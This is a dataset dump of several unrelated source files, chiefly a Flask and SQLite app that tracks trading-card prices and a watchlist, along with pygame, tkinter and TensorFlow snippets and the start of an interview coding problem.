query.sql += \"WHERE?AND ({Closed} IS NULL or {Closed} = 0)\\n\" \n query.sql += \"ORDER BY {Code} \"\n if(query.open()):\n self.startTable()\n self.header(\"Code\",\"Name\",\"Label\",\"Price\")\n for r in query:\n self.startRow()\n self.addValue(r.ArtCode,Window=\"ItemWindow\", FieldName=\"Code\")\n self.addValue(r.ArtName,CallMethod=\"selectArticle\",Parameter = r.ArtCode)\n self.addValue(r.Classification)\n self.addValue(r.Price)\n self.endRow()\n self.endTable()\n 
query.close()\n","sub_path":"standard/reports/ItemTree.py","file_name":"ItemTree.py","file_ext":"py","file_size_in_byte":5891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"623503005","text":"import tensorflow as tf\n\nfrom tensorflow import keras\n\n\"\"\"\nThe idea is to create\n\n--> encoder --> latent --> decoder -->\n\n\n\n\n\n--> embeddings --> rnn --> generator --.\n\"\"\"\n\n\ndef main(args=None):\n (train_data, test_data), info = tfds.load('imdb_reviews/subwords8k',\n split=(tfds.Split.TRAIN, tfds.Split.TEST),\n with_info=True, as_supervised=True)\n\n embedding_layer = keras.layers.Embedding(1000, 5)\n result = embedding_layer(tf.constant([[0, 1, 2], [3, 4, 5]]))\n print(result.numpy())\n print(result.shape)\n","sub_path":"src/_experiments/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"163820576","text":"import pygame\nimport time\n\nWIN_WIDTH = 1024\nWIN_HEIGHT = 600\nBTN_WIDTH = 80\nBTN_HEIGHT = 80\nHP_WIDTH = 40\nHP_HEIGHT = 40\nFPS = 30\n\n# color (RGB)\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\n\n# initialization\npygame.init()\n# Create window surface\nwin = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))\n\n# load image (background, enemy, buttons)\nbackground_image = pygame.transform.scale(pygame.image.load(\"images/Map.png\"), (WIN_WIDTH, WIN_HEIGHT))\nenemy_image = pygame.transform.scale(pygame.image.load(\"images/enemy.png\"), (50, 50))\ncontinue_image = pygame.transform.scale(pygame.image.load(\"images/continue.png\"), (BTN_WIDTH, BTN_HEIGHT))\npause_image = pygame.transform.scale(pygame.image.load(\"images/pause.png\"), (BTN_WIDTH, BTN_HEIGHT))\nsound_image = pygame.transform.scale(pygame.image.load(\"images/sound.png\"), (BTN_WIDTH, BTN_HEIGHT))\nmuse_image = pygame.transform.scale(pygame.image.load(\"images/muse.png\"), (BTN_WIDTH, BTN_HEIGHT))\nhp_image = pygame.transform.scale(pygame.image.load(\"images/hp.png\"), (HP_WIDTH,HP_HEIGHT))\nhp_gray_image = pygame.transform.scale(pygame.image.load(\"images/hp_gray.png\"), (HP_WIDTH,HP_HEIGHT))\n\n# set the title\npygame.display.set_caption(\"My first game\")\n\n\n\nclass Game:\n def __init__(self):\n # window\n # ...(to be done)\n\n # hp\n self.hp = 7\n self.max_hp = 10\n pass\n\n def game_run(self):\n # game loop\n run = True\n while run:\n # event loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n\n # draw background\n win.blit(background_image,(0,0))\n pygame.draw.rect(win, (0, 0, 0), [0, 0, 1024, 80])\n\n # draw enemy and health bar\n pygame.draw.rect(win,RED,[30,260,50,5])\n win.blit(enemy_image,(30,270))\n win.blit(hp_image,(400,0))\n win.blit(hp_image, (440, 0))\n win.blit(hp_image, (480, 0))\n win.blit(hp_image, (520, 0))\n win.blit(hp_image, (560, 0))\n win.blit(hp_image, (400, 40))\n win.blit(hp_image, (440, 40))\n win.blit(hp_gray_image, (480, 40))\n win.blit(hp_gray_image, (520, 40))\n win.blit(hp_gray_image, (560, 40))\n\n # draw menu (and buttons)\n win.blit(muse_image,(700,0))\n win.blit(sound_image, (780, 0))\n win.blit(continue_image, (860, 0))\n win.blit(pause_image, (940, 0))\n\n # draw time\n done = False\n clock = pygame.time.Clock()\n font = pygame.font.Font(None, 40)\n frame_count = 0\n frame_rate = 60\n\n while not done:\n # time loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n pygame.draw.rect(win, (0, 
0, 0), [0, 570, 70, 50])\n\n total_seconds = frame_count // frame_rate\n\n minutes = total_seconds // 60\n\n seconds = total_seconds % 60\n\n output_string = \"{0:2}:{1:02}\".format(minutes, seconds)\n\n text_surface = font.render(output_string, True, WHITE)\n win.blit(text_surface, (0, 575))\n\n frame_count += 1\n clock.tick(frame_rate)\n pygame.display.update()\n pygame.quit()\n\n\nif __name__ == \"__main__\":\n covid_game = Game()\n covid_game.game_run()\n\npygame.quit()","sub_path":"Lab2.py","file_name":"Lab2.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"639795892","text":"from flask import Flask, render_template, request\nimport sqlite3 as sql\nimport cardAverage\nimport datetime\nimport time\n\n\n# This is my flask file which runs the application\n\napp = Flask(__name__)\n\n# the location of the database, when running locally vs on server\ndbLoc = '/home/timc/flask_project/flask_app/CARDINFO.db'\n#dbLoc = 'CARDINFO.db'\n\n\ntry:\n print('collecting distinct names')\n card_names = []\n con = sql.connect(dbLoc)\n con.row_factory = sql.Row\n cur = con.cursor()\n cur.execute('''select distinct(name) \n from CARDS \n where substr(type,1,5) != \"Token\" \n and substr(type,1,6) != \"Emblem\" \n and substr(type,1,4) != \"Card\" \n and substr(type,1,6) != \"Scheme\" \n and onlineonly = \"False\" \n and nonfoil = \"True\"''')\n rows = cur.fetchall()\n con.close()\n for x in rows:\n card_names.append(x[0])\nexcept:\n print('could not collect distinct names')\n#\n# App routes:\n#\n# index: the front page, I have a static card example to show the site's features\n# list: I fetch and display a set of cards so users can see what kind of data I have\n# watchlist: a list of cards users can modify to track cards with\n# search: a series of get/post routes for searching for specific cards\n# topcards: an experimental page for displaying useful statistics and potential future features.\n# I have it displaying some pandas stuff right now.\n\n\n\n@app.route('/')\ndef index(chartID = 'chart_ID', chart_type = 'line', chart_height = 500):\n # the front page with a static example card\n priceList = []\n dateList = []\n cardId = \"810a3792-a689-4849-bc14-fb3c71153aba\"\n imageUrl = \"\"\n cardName = \"Land Tax\"\n\n\n con = sql.connect(dbLoc)\n con.row_factory = sql.Row\n cur = con.cursor()\n\n imageUrl = 'https://img.scryfall.com/cards/normal/front/8/1/810a3792-a689-4849-bc14-fb3c71153aba.jpg?1562920975'\n\n\n# collects price and date vals of land tax to load up front page quickly\n land_tax_vals = cur.execute(\"select * from frontpage order by datetime asc\")\n \n for vals in land_tax_vals:\n priceList.append(vals[1])\n dateList.append(vals[0])\n con.close()\n\n # chart insertion\n try:\n chart = {\"renderTo\": chartID, \"type\": chart_type, \"height\": chart_height, \"zoomType\": 'x'}\n series = [{\"name\": 'Price', \"data\": priceList}]\n title = {\"text\": cardName}\n xAxis = [{\"categories\": dateList},{'type':'datetime'}]\n yAxis = {\"title\": {\"text\": 'Price in dollars'}}\n pageType = 'graph'\n except:\n print('something went wrong with the highcart vars')\n\n return render_template('frontPage.html',\n pageType=pageType, \n chartID=chartID, \n chart=chart, \n series=series, \n title=title, \n xAxis=xAxis, \n yAxis=yAxis, \n imageUrl=imageUrl, \n cardId = cardId, \n cardName = cardName, \n card_names=card_names)\n\n@app.route('/list')\ndef listPage():\n con = sql.connect(dbLoc)\n con.row_factory = 
sql.Row\n cur = con.cursor()\n cur.execute(\"select * from CARDS where cardset='aer'\")\n rows = cur.fetchall()\n con.close()\n\n return render_template(\"listLayout.html\", rows = rows, card_names=card_names)\n\n@app.route('/watchlist', methods=['POST', 'GET'])\ndef watchlist():\n\n if request.method == 'GET':\n print('watchlist get request')\n rows = getWatchList()\n\n return render_template(\"watchlistLayout.html\", rows = rows, card_names=card_names)\n\n # post to insert\n elif request.form.get('removeCard') == None:\n print('/watchlist post request insert')\n con = sql.connect(dbLoc)\n con.row_factory = sql.Row\n cur = con.cursor()\n # this is the name from html\n r = (request.form['watchlist'])\n\n cardId = \"\"\n valueIndicator = \"\"\n\n # card ID fetching\n # selects first available ID where id's len is 3\n try:\n for cardIdNum in cur.execute(\"\"\"select ID \n from CARDS \n where UPPER(NAME)=UPPER((?)) \n and cards.ONLINEONLY != 'True' \n and length(cardset)=3 \n and nonfoil = 'True'\"\"\", \n (r, )):\n cardId = cardIdNum[0]\n except:\n print('could not find card')\n\n # the cardAverage week/month for the searched card\n valueIndicator = cardAverage.weekMonth(cardId)[2]\n\n # insert to watchlist\n try:\n cur.execute(\"INSERT or replace into watchlist (ID, PRICEDIRECTION) values (?, ?)\", \n (cardId, valueIndicator, ) )\n con.commit()\n except:\n print('could not insert card')\n con.close()\n\n rows = getWatchList()\n\n return render_template(\"watchlistLayout.html\", rows=rows, card_names=card_names)\n\n # post request to remove card from list\n else:\n print(\"remove card post request\")\n con = sql.connect(dbLoc)\n cur = con.cursor()\n cardID = request.form.get('removeCard')\n\n try:\n cur.execute(\"delete from watchlist where ID=(?)\", (cardID, ))\n print('removed ',cardID,' from watchlist')\n except:\n print('could not remove card from watchlist')\n con.commit()\n con.close()\n\n rows = getWatchList()\n\n return render_template(\"watchlistLayout.html\", rows = rows, card_names=card_names)\n\n@app.route('/search/', methods=['GET', 'POST'])\ndef searchID(cardId, chartID = 'chart_ID2', chart_type = 'line', chart_height = 500):\n # the search bar results for the layout html\n if request.method == \"GET\":\n print('search cardID get request')\n con = sql.connect(dbLoc)\n con.row_factory = sql.Row\n cur = con.cursor()\n\n # initializing my variables\n priceList = []\n dateList = []\n imageUrl = \"\"\n sameCards = []\n setCodes = []\n sameCardsCombo = []\n cardInfo = {}\n cardName = \"\"\n\n # selects name and set of the card\n try:\n for x in cur.execute(\"select NAME, CARDSET from CARDS where ID=(?)\", (cardId, )):\n print('the name is:', x[0])\n print('the set is:', x[1])\n cardName = x[0]\n setCodes.append(x[1])\n except:\n print('I couldnt get the card name')\n\n\n # select ids of all reprints\n print('card im looking up:', cardId)\n try:\n for x in cur.execute(\"\"\"select id, \n cardset \n from cards \n where name = (?) 
\n and cards.ONLINEONLY != 'True'\"\"\",(cardId,)):\n try:\n sameCards.append(x[0])\n except:\n print('could not append samecards in sameName')\n try:\n sameCardsCombo.append([x[0], x[1]])\n except:\n print('could not append sameCardCombo in sameName')\n \n print(\"i found an ID\")\n print(\"x 0:\",x[0])\n print(\"x 1:\",x[1])\n print('samecardcombo:',sameCardsCombo)\n except:\n print('I couldnt select the ids for samecards')\n\n try:\n print('running searchCard')\n imageUrl = searchCard(cardId, cur, priceList, dateList, imageUrl)\n print('prices:',priceList)\n except:\n print('cant perform searchcard')\n try:\n cur.execute(\"select cards.cmc, type, power, toughness, rarity from cards where cards.id == ((?))\",\n (cardId, ))\n fetchInfo = cur.fetchone()\n except:\n print('could not perform id sql search')\n\n for value in fetchInfo:\n print('value: ',value)\n try:\n cardInfo['cmc'] = fetchInfo['cmc']\n cardInfo['type'] = fetchInfo['type']\n cardInfo['power'] = fetchInfo['power']\n cardInfo['toughness'] = fetchInfo['toughness']\n cardInfo['rarity'] = fetchInfo['rarity']\n cardInfo['buylist'] = 'N/A'\n except:\n print('could not add values to cardInfo dictionary')\n\n print('the card cmc value:', cardInfo['cmc'])\n print('search value:', cardInfo['type'])\n print('power:',cardInfo['power'])\n\n con.close()\n\n # chart data routed to javascript\n chart = {\"renderTo\": chartID, \"type\": chart_type, \"height\": chart_height, \"zoomType\": 'x'}\n series = [{\"name\": 'Price', \"data\": priceList}]\n title = {\"text\": cardName}\n xAxis = {\"categories\": dateList}\n yAxis = {\"title\": {\"text\": 'Price in dollars'}}\n pageType = 'graph'\n\n return render_template(\"resultsLayout.html\", \n pageType=pageType, \n chartID=chartID, \n chart=chart, \n series=series, \n title=title, \n xAxis=xAxis, \n yAxis=yAxis, \n imageUrl=imageUrl, \n sameCards = sameCards, \n setCodes = setCodes, \n cardId = cardId, \n sameCardsCombo = sameCardsCombo, \n cardInfo = cardInfo, \n card_names=card_names)\n\n elif request.method == \"POST\":\n # post means i'm adding a card to the watchlist\n print('the request was post')\n\n con = sql.connect(dbLoc)\n cur = con.cursor()\n\n valueIndicator = cardAverage.weekMonth(cardId)[2]\n try:\n cur.execute(\"INSERT or replace into watchlist (ID, PRICEDIRECTION) values (?, ?)\", \n (cardId, valueIndicator, ) )\n con.commit()\n except:\n print('could not insert card')\n con.close()\n rows = getWatchList()\n\n return render_template(\"watchlistLayout.html\", rows = rows, card_names=card_names)\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'), 404\n\n\n@app.route('/search', methods=['POST'])\ndef searchResults(chartID = 'chart_ID2', chart_type = 'line', chart_height = 500):\n # search with the searchbar form result\n\n print('doing search post method')\n if request.form.get('searchbar') == None:\n print(\"request form searchbar is nothing:\", request.form.get('addCard'))\n return \"searchbar is nothing\"\n else:\n print('request form searchbar has a value')\n\n # r is the name in string format\n try:\n r = (request.form['searchbar'])\n print('r result is:', r)\n except:\n print('the r request did not go through')\n\n try:\n q = request.form\n print(\"q:\", q)\n except:\n print('cant print q')\n\n con = sql.connect(dbLoc)\n con.row_factory = sql.Row\n cur = con.cursor()\n\n cardId = \"\"\n priceList = []\n dateList = []\n imageUrl = \"\"\n cardInfo = {}\n sameCards = []\n sameCardsCombo = []\n # for the result of the name search, get the ID and 
put it in cardId\n try:\n print('checking for every card with the name:',r)\n searchResult = cur.execute(\"\"\"select id, \n cardset \n from cards \n where name = (upper(?)) \n and cards.ONLINEONLY != 'True' \n and length(cardset)=3\"\"\",(r,))\n\n print('looking at:',searchResult)\n\n if not searchResult:\n print('there was no search result')\n return 'there was no search result'\n for x in searchResult:\n print('value of x:',x)\n if not x:\n print('there was no search result')\n return \"there was no search result\"\n try:\n sameCards.append(x[0])\n print('appending samecards with :',x[0])\n except:\n print('could not append samecards in sameName')\n try:\n sameCardsCombo.append([x[0], x[1]])\n except:\n print('could not append sameCardCombo in sameName')\n\n print(\"x 0:\",x[0])\n print(\"x 1:\",x[1])\n print('samecardcombo:',sameCardsCombo)\n\n except:\n print('I couldnt select the ids for samecards')\n\n try:\n for cardIdNum in cur.execute(\"\"\"select ID, \n CARDSET from CARDS \n where UPPER(NAME)=UPPER((?)) \n and cards.ONLINEONLY != 'True' \n and length(cardset)=3 \n and cardset != 'mb1'\"\"\", \n (r, )):\n cardId = cardIdNum[0]\n print('cardId from execute:',cardId)\n # most cards have more than one printing, this compiles a list of each card\n # currently, I display the last card thats in my list I also filter to remove online cards and promos\n sameCards.append(cardIdNum[0])\n sameCardsCombo.append([cardIdNum[0], cardIdNum[1]])\n except:\n print('I couldnt get the cardID')\n\n # my test to print all the cards with the same name\n for x in sameCards:\n print('unique printing:',x)\n if not cardId:\n print('there is no card ID')\n return render_template('frontPage.html', card_names=card_names)\n imageUrl = searchCard(cardId, cur, priceList, dateList, imageUrl)\n\n print('imageUrl after searchcard:', imageUrl)\n print('priceList to display:',priceList)\n\n # here I collect the bits of data I want to display, cmc, color, stats etc\n cur.execute(\"\"\"select \n cmc, \n type, \n power, \n toughness, \n rarity \n from cards \n where id == ((?))\"\"\",\n (cardId, ))\n fetchInfo = cur.fetchone()\n\n for value in fetchInfo:\n print('value: ',value)\n try:\n cardInfo['cmc'] = fetchInfo[0]\n cardInfo['type'] = fetchInfo[1]\n cardInfo['power'] = fetchInfo[2]\n cardInfo['toughness'] = fetchInfo[3]\n cardInfo['rarity'] = fetchInfo[4]\n cardInfo['buylist'] = 'N/A'\n except:\n print('could not add values to cardInfo dictionary here')\n\n# cur.execute(\"\"\"select buylist.BUYPRICE, \n# buylist.DATETIME \n# from buylist, \n# cards, \n# CARDSET \n# where cards.id == ((?)) \n# and cards.CARDSET = CARDSET.CODE \n# and upper(cardset.name) = upper(replace (buylist.SETNAME,'-',' ')) \n# and upper(cards.name) = upper(buylist.NAME) \n# order by datetime desc\"\"\",\n# (cardId, ))\n\n\n\n print('the card cmc value:', cardInfo['cmc'])\n print('search value:', cardInfo['type'])\n print('power:',cardInfo['power'])\n\n con.close()\n\n # chart data\n try:\n chart = {\"renderTo\": chartID, \"type\": chart_type, \"height\": chart_height, \"zoomType\": 'x'}\n series = [{\"name\": 'Price', \"data\": priceList}]\n title = {\"text\": r}\n xAxis = {\"categories\": dateList}\n yAxis = {\"title\": {\"text\": 'Price in dollars'}}\n pageType = 'graph'\n except:\n print('something went wrong with the highcart vars')\n\n return render_template(\"resultsLayout.html\", \n pageType=pageType, \n chartID=chartID, \n chart=chart, \n series=series, \n title=title, \n xAxis=xAxis, \n yAxis=yAxis, \n imageUrl=imageUrl, \n sameCards = 
sameCards, \n cardId = cardId, \n sameCardsCombo = sameCardsCombo, \n cardInfo = cardInfo, \n card_names=card_names)\n\ndef searchCard(cardId, cur, priceList, dateList, imageUrl):\n # for the url I make the variable the string, and for the date and price I add them to the lists\n #import pdb; pdb.set_trace()\n print('im doing a search card for:', cardId)\n try:\n for cardUrl in cur.execute(\"select PICURL from cards where id=(?)\",(cardId,)):\n imageUrl = cardUrl[0]\n print('imageURL from searchcard:', imageUrl)\n # if the card is only foil, get foil prices. else get nonfoil prices\n\n # this for loop is what makes loading a search slow\n for priceN in cur.execute(\"select datetime,normprice from prices where id=(?) order by datetime asc\",(cardId,)):\n if priceN[1] is None:\n priceList.append(0)\n else:\n priceList.append(priceN[1])\n dateList.append(priceN[0])\n return imageUrl\n except:\n print('the for-loops didnt work for cardUrl and price chart lists')\n\ndef updateTrend(cardId):\n print('running updateTrend for',cardId)\n try:\n con = sql.connect(dbLoc)\n con.row_factory = sql.Row\n cur = con.cursor()\n print('connected to db')\n except:\n print('couldnt connect to db')\n\n try:\n valueIndicator = \"\"\n valueIndicator = cardAverage.weekMonth(cardId)[2]\n print('collected cardAverage')\n except:\n print('could not perform cardAverage')\n # insert to watchlist\n try:\n cur.execute(\"INSERT or replace into watchlist (ID, PRICEDIRECTION) values (?, ?)\", \n (cardId, valueIndicator, ) )\n con.commit()\n con.close()\n except:\n print('could not update card with updateTrend')\n con.close()\n\n\n@app.route('/search', methods=['GET'])\ndef searchGet():\n return render_template(\"searchGetLayout.html\", card_names=card_names)\n\n@app.route('/topCards')\ndef topCards():\n\n # tensorflow/keras processing could go here in the future\n\n # return render_template(\"topLayout.html\", rows = rows)\n return render_template(\"topLayout.html\", card_names=card_names)\n\n\n\n\n\n\n\n\n\n@app.route('/collection', methods=['GET', 'POST'])\ndef collectionPage():\n collection_rows = getCollection()\n today = getTime()\n\n try:\n # grab the chart values for today: total mrsp, and what I paid\n # push those numbers to the database for today's date\n cardsDb = sql.connect(dbLoc)\n cursor = cardsDb.cursor()\n todays_price,total_msrp,total_paid = collection_tally(collection_rows,cursor,today)\n tally_pusher(total_msrp,total_paid,cursor,today)\n cardsDb.commit()\n cardsDb.close()\n print('ran collection tally and pusher')\n except:\n print('could not run collection tally or pusher')\n print('values:')\n no_val = [todays_price,total_msrp,total_paid]\n for x in no_val:\n try:\n print(x)\n except:\n print('could not print val')\n\n if request.method == \"GET\":\n None\n # if its a post and adding a card from the form\n elif request.method == \"POST\" and request.form.get('removeCard') == None:\n\n try:\n # html form request\n user_id = 'timtim'\n cost_paid = 3\n number_owned = 1\n card_name = (request.form['name-form'])\n set_code = (request.form['set-form'])\n cost_paid = (request.form['cost-form'])\n number_owned = (request.form['number-form'])\n except:\n print('could not request html form data')\n\n try:\n # check form data results for missing info\n if number_owned is '':\n print('number owned is none')\n number_owned = 1\n else:\n print('number owned is not none')\n\n if cost_paid is '':\n print('cost is none')\n cost_paid = 0\n else:\n print('cost is not none')\n \n if set_code is '':\n print('set code is 
none')\n cardsDb = sql.connect(dbLoc)\n cursor = cardsDb.cursor()\n cursor.execute('''select cardset,\n id \n from cards \n where upper(name)=upper(?) \n and cards.ONLINEONLY != \"True\" \n and length(cardset)=3\n and nonfoil = \"True\"\n ''',\n (card_name,))\n set_code,card_id = cursor.fetchone()\n cardsDb.close()\n else:\n print('set code is known')\n except:\n print('something went wrong checking form data results')\n\n try:\n # select id from cards\n cardsDb = sql.connect(dbLoc)\n cursor = cardsDb.cursor()\n card_id = cursor.execute('''select id \n from cards \n where upper(name) = upper((?)) \n and upper(cardset) = upper((?))''',\n (card_name,set_code,))\n cardid = card_id.fetchone()[0]\n print('cardid:',cardid)\n except:\n print('could not select id from cards')\n\n try:\n print('selecting latest normprice')\n cursor.execute('''select normprice \n from prices where id = (?) \n order by datetime desc''',\n (cardid,))\n price = cursor.fetchone()\n print('card normprice:',price[0])\n if price[0] == None:\n print('price[0] is None')\n price[0] = 0\n except:\n print('could not select latest normprice')\n try:\n # insert into collections\n cursor.execute('''insert into collections \n (user_id, \n card_id, \n cost_paid, \n msrp, \n number_owned, \n name, \n code, \n datetime, \n transaction_id) \n values (?, ?, ?, ?, ?, ?, ?, ?, NULL)''',\n (user_id, \n cardid, \n cost_paid, \n price[0], \n number_owned, \n card_name, \n set_code, \n today, ))\n cardsDb.commit()\n except:\n print('could not insert into collections')\n unable = [user_id, \n cardid, \n cost_paid, \n price[0], \n number_owned, \n card_name, \n set_code, \n today]\n for x in unable:\n try:\n print(x)\n except:\n print('cant print this val')\n\n try:\n # print collections, run getCollection\n for x in cursor.execute('select * from collections'):\n print(x)\n collection_rows = getCollection()\n except:\n print('could not run getCollection')\n\n try:\n #pusher\n todays_price,total_msrp,total_paid = collection_tally(collection_rows,cursor,today)\n #pushes new information so graph will have current info\n tally_pusher(total_msrp,total_paid,cursor,today)\n cardsDb.commit()\n cardsDb.close()\n except:\n print('couldnt run collection tally, or pusher')\n print('values:')\n mis_val = []\n\n\n else:\n print(\"remove card post collection\")\n con = sql.connect(dbLoc)\n cur = con.cursor()\n transaction_id = request.form.get('removeCard')\n\n try:\n cur.execute(\"delete from collections where transaction_id=(?)\", (transaction_id, ))\n print('removed ',transaction_id,' from collections')\n except:\n print('could not remove card from collections')\n con.commit()\n con.close()\n\n collection_rows = getCollection()\n\n cardsDb = sql.connect(dbLoc)\n cursor = cardsDb.cursor()\n todays_price,total_msrp,total_paid = collection_tally(collection_rows,cursor,today)\n #pushes new information so graph will have current info\n tally_pusher(total_msrp,total_paid,cursor,today)\n cardsDb.commit()\n cardsDb.close()\n\n p = price_chart()\n try:\n perc = int(total_msrp/total_paid * 100)\n except:\n perc = 0\n\n return render_template(\"collection.html\", \n collection_rows = collection_rows, \n todays_price=todays_price, \n perc = perc, \n total_msrp = round(total_msrp,2), \n total_paid=round(total_paid,2), \n pageType=p[5], \n chartID=\"chart_ID\", \n chart=p[0], \n series=p[1], \n title=p[2], \n xAxis=p[3], \n yAxis=p[4], \n card_names=card_names)\n\ndef getWatchList():\n# this is a function to get the watchlist results which I use in my GET and POST for 
/watchlist\n print('running getwatchlist')\n try:\n con = sql.connect(dbLoc)\n con.row_factory = sql.Row\n cur = con.cursor()\n print('connected to db')\n except:\n print('could not connect to db')\n try:\n cur.execute(\"\"\"select cards.name, \n watchlist.pricedirection, \n cards.id \n from watchlist, \n cards \n where watchlist.id = cards.id\"\"\")\n rows = cur.fetchall()\n except:\n print('could not select watchlist')\n\n for x in rows:\n print(x['id'])\n\n con.close()\n return rows\n\ndef getCollection():\n# selects existing card information from collection db\n print('running getCollection')\n try:\n con = sql.connect(dbLoc)\n con.row_factory = sql.Row\n cur = con.cursor()\n print('connected to db')\n except:\n print('could not connect to db')\n try:\n cur.execute(\"select * from collections where user_id = 'timtim'\")\n except:\n print('could not select collection')\n try:\n rows = cur.fetchall()\n print('selecting all collection values for timtim:')\n except:\n print('could not fetch all collection')\n\n try:\n for x in rows:\n print(x['name'])\n except:\n print('could not print rows')\n con.close()\n try:\n print('returning rows')\n return rows\n except:\n print('get_collection returned nothing')\n return []\n\ndef getTime():\n# returns todays date in string format\n ts = time.time()\n dailyTime = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d')\n print('test getTime:',dailyTime)\n return dailyTime\n\ndef yesterday():\n# returns yesterdays date in string format\n ts = time.time() - 86400\n dailyTime = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d')\n print('test yesterday:',dailyTime)\n return dailyTime\n\ndef collection_tally(collection_rows,cursor,today):\n# counts up values of the cards listed in user's collection\n# returns the total values \n print('running collection tally')\n todays_price = []\n total_msrp = 0\n total_paid = 0\n\n for card in collection_rows:\n cursor.execute('''select normprice \n from prices \n where id = (?) \n order by datetime desc''',(card[\"card_id\"],))\n try:\n prix = cursor.fetchone()\n try:\n if prix[0] == None:\n print('prix is None')\n prix[0] = 0\n else:\n print('price is:',prix[0])\n except:\n print('could not fix prix')\n print('prix is:',[prix])\n todays_price.append(prix)\n print('number owned:',card[\"number_owned\"])\n total_msrp = total_msrp+ card[\"number_owned\"] * prix[0]\n total_paid = total_paid+ card[\"number_owned\"] * card[\"cost_paid\"]\n except:\n print('something went wrong with collection_tally calculations')\n\n #total_paid could also go here\n return todays_price,total_msrp,total_paid\n\ndef tally_pusher(total_msrp,total_paid,cursor,today):\n# push the daily tally to a db\n# this is a wrapper for a user's tally. 
I currently have it hardcoded to \"timtim\".\n print('running tally pusher:')\n print('todays msrp is:',total_msrp)\n try:\n cursor.execute('''insert or replace \n into COLLECTION_VAL \n (USER_ID,COL_VAL,PAID_VAL,DATETIME) \n values (?,?,?,?)''',\n (\"timtim\",total_msrp,total_paid,today,))\n print('tally pushed')\n except:\n print('could not push tally')\n print('tally pusher ending')\n\ndef price_chart():\n# used for displaying collection highcart\n# returns values in a dictionary\n print('running price_chart')\n try:\n print('refreshing chart data')\n cardsDb = sql.connect(dbLoc)\n cursor = cardsDb.cursor()\n chart_vals = cursor.execute(\"\"\"select DATETIME,\n COL_VAL, \n PAID_VAL \n from collection_val \n order by datetime asc\"\"\")\n except:\n print('could not refresh chart data')\n x_ax = []\n y_ax = []\n z_ax = []\n try:\n for vals in chart_vals:\n print(vals)\n x_ax.append(vals[0])\n y_ax.append(vals[1])\n z_ax.append(vals[2])\n cardsDb.close()\n except:\n print('could not append chart_vals')\n cardsDb.close()\n\n # chart insertion\n\n try:\n chart = {\"renderTo\": \"chart_ID\", \"type\": \"area\", \"height\": 500, \"zoomType\": 'x'}\n series = [{\"name\": \"MSRP\", \"data\": y_ax},{\"name\": \"Paid\",\"data\":z_ax}]\n title = {\"text\": \"cost vs value\"}\n xAxis = [{\"categories\": x_ax},{'type':'datetime'}]\n yAxis = {\"title\": {\"text\": 'Price in dollars'}}\n pageType = 'graph'\n except:\n print('something went wrong with the highcart vars')\n# this line converts lists of my dates to date objects. \n# change \"datetime\" at the end to the list's name(x_ax in this case)\n# dates_list = [dt.datetime.strptime(date, '%Y-%m-%d').date() for date in datetime]\n return [chart,series,title,xAxis,yAxis,pageType]\n\n\n\n\ndef buy_vs_tcg():\n None\n '''select buylist.DATETIME,\n buylist.BUYPRICE,\n prices.NORMPRICE from \n buylist,\n cardset,\n cards,\n prices \n where upper(cardset.NAME) = upper(buylist.SETNAME) \n and buylist.name = \"Land Tax\" \n and buylist.SETNAME = \"battlebond\" \n and cardset.code = cards.CARDSET \n and cards.NAME = buylist.NAME \n and prices.id = cards.ID \n and buylist.datetime=prices.DATETIME \n order by buylist.datetime'''\n\n\ndef get_id(name,setCode):\n# returns card ID with a name and set code\n con = sql.connect(dbLoc)\n cursor = con.cursor()\n cursor.execute('''select cards.id \n from cards \n where upper(cards.name) = upper(?) \n and cards.cardset = (?)''',\n (name,setCode))\n card_id = cursor.fetchone()\n print('card_id:',card_id)\n con.close()\n return card_id\n\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n\n\n","sub_path":"project_flask.py","file_name":"project_flask.py","file_ext":"py","file_size_in_byte":29804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"215977462","text":"from tkinter import *\nfrom sound_panel import *\n# from tkinter.messagebox import askokcancel\nimport pygame.mixer\nimport os\n\napp = Tk()\napp.title(\"Sound Mix\")\n# app.geometry('300x100+200+100')\n\n# Start the sound system\nmixer = pygame.mixer\nmixer.init()\n\n# Get names of all files in current directory\ndirList = os.listdir(\".\")\n# Take each of the filenames...\nfor fname in dirList:\n # ... 
and if it ends in \".wav\"\n    if fname.endswith(\".wav\"):\n        # Create the panel and add it to the GUI\n        panel = SoundPanel(app, mixer, fname)\n        panel.pack()\n\n\n# This function will stop all necessary jobs before shutdown\ndef shutdown():\n    # if askokcancel(title=\"Are you sure?\", message=\"Do you really want to quit?\"):\n    # Stop any playing tracks\n    mixer.stop()\n    # Close the application\n    app.destroy()\n\napp.protocol(\"WM_DELETE_WINDOW\", shutdown)\n\n# Start the GUI event loop\napp.mainloop()\n","sub_path":"sound-mixer/soundmix.py","file_name":"soundmix.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"189058406","text":"# Amazon would like to know how much inventory exists in their closed inventory compartments. Given a string s\n# consisting of items as \"*\" and closed compartments as an open and close \"|\", an array of starting indices startIndices, and an array of ending indices endIndices, determine the number of items in closed compartments within the substring between the two indices, inclusive.\n#\n# An item is represented as an asterisk ('*' = ascii decimal 42)\n# A compartment is represented as a pair of pipes that may or may not have items between them ('|' = ascii decimal 124).\n#\n# Example\n#\n# s = '|**|*|*'\n#\n# startIndices = [1, 1]\n#\n# endIndices = [5, 6]\n#\n# The string has a total of 2 closed compartments, one with 2 items and one with 1 item. For the first pair of indices, (1, 5), the substring is '|**|*'. There are 2 items in a compartment.\n#\n# For the second pair of indices, (1, 6), the substring is '|**|*|' and there are 2 + 1 = 3 items in compartments.\n#\n# Both of the answers are returned in an array, [2, 3].\n#\n# Function 